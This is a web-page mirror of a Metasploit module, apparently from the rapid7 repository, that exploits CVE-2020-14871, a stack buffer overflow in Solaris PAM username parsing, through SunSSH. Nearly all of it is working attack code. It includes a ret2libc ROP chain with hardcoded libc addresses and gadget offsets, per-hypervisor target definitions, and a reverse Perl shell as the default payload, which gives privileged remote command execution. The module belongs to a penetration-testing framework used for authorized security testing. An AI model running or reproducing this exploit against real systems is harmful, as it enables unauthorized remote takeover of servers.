CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/ssh/pam_username_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = NormalRanking

9


10
  prepend Msf::Exploit::Remote::AutoCheck

11
  include Msf::Exploit::Remote::CheckModule

12
  include Msf::Exploit::Remote::SSH

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a stack-based buffer overflow in the Solaris PAM

21
          library's username parsing code, as used by the SunSSH daemon when the

22
          keyboard-interactive authentication method is specified.

23


24
          Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,

25
          VMware Fusion, and VMware Player. Bare metal untested. Your addresses

26
          may vary.

27
        },

28
        'Author' => [

29
          'Jacob Thompson', # Analysis

30
          'Aaron Carreras', # Analysis

31
          'Jeffrey Martin', # Testing

32
          'Hacker Fantastic', # PoC

33
          'wvu' # Exploit

34
        ],

35
        'References' => [

36
          ['CVE', '2020-14871'],

37
          ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],

38
          ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'],

39
          ['URL', 'https://hacker.house/lab/cve-2020-18471/'],

40
          ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841']

41
        ],

42
        'DisclosureDate' => '2020-10-20', # Vendor advisory

43
        'License' => MSF_LICENSE,

44
        'Platform' => 'unix',

45
        'Arch' => ARCH_CMD,

46
        'Privileged' => true,

47
        'Payload' => {

48
          # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617

49
          'BadChars' => "\x00\x09\x20",

50
          'Encoder' => 'cmd/perl'

51
        },

52
        'Targets' => [

53
          [

54
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware',

55
            {

56
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',

57
              'LibcBase' => 0xfeb90000

58
            }

59
          ],

60
          [

61
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox',

62
            {

63
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',

64
              'LibcBase' => 0xfeb80000

65
            }

66
          ]

67
        ],

68
        'DefaultTarget' => 0,

69
        'DefaultOptions' => {

70
          'PAYLOAD' => 'cmd/unix/reverse_perl',

71
          'SSH_TIMEOUT' => 2,

72
          'CheckModule' => 'auxiliary/scanner/ssh/ssh_version'

73
        },

74
        'Notes' => {

75
          'Stability' => [CRASH_SERVICE_RESTARTS],

76
          'Reliability' => [REPEATABLE_SESSION],

77
          'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS]

78
        }

79
      )

80
    )

81
  end

82


83
  def check

84
    # Run auxiliary/scanner/ssh/ssh_version

85
    checkcode = super

86


87
    return checkcode unless checkcode == CheckCode::Detected

88


89
    unless target['Ident'] == checkcode.details[:ident]

90
      return CheckCode::Safe("#{target.name} is an incompatible target.")

91
    end

92


93
    CheckCode::Appears("#{target.name} is a compatible target.")

94
  end

95


96
  def exploit

97
    print_status("Exploiting #{target.name}")

98


99
    ssh_client_opts = ssh_client_defaults.merge(

100
      port: rport,

101
      auth_methods: ['keyboard-interactive'],

102
      password: ret2libc, # HACK: This is really the username prompt on Solaris

103
      timeout: datastore['SSH_TIMEOUT']

104
    )

105


106
    ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

107


108
    print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}")

109


110
    # Empty initial username

111
    Net::SSH.start(rhost, '', ssh_client_opts)

112
  rescue Net::SSH::AuthenticationFailed

113
    print_error(CheckCode::Safe.message)

114
  rescue Net::SSH::Disconnect

115
    print_warning('Disconnected, target selection may be incorrect!')

116
  rescue Net::SSH::ConnectionTimeout

117
    # Do nothing on success

118
  end

119


120
  # XXX: No ASLR, but NX stack and libc base changes...

121
  def ret2libc

122
    buf = rand_text(516) # Offset to saved EIP

123
    buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret

124
    buf << rand_text(4) # Padding

125
    buf << p32(0x08040101) # ecx

126
    buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret

127
    buf << p32(target['LibcBase'] + 0x256d0) # exit(3)

128
    buf << p32(target['LibcBase'] + 0x91edf) # system(3)

129
    buf << rand_text(4) # Padding

130
    buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret

131
    buf << payload.encoded

132
  end

133


134
  def p32(addr)

135
    [addr].pack('V')

136
  end

137


138
end

139


140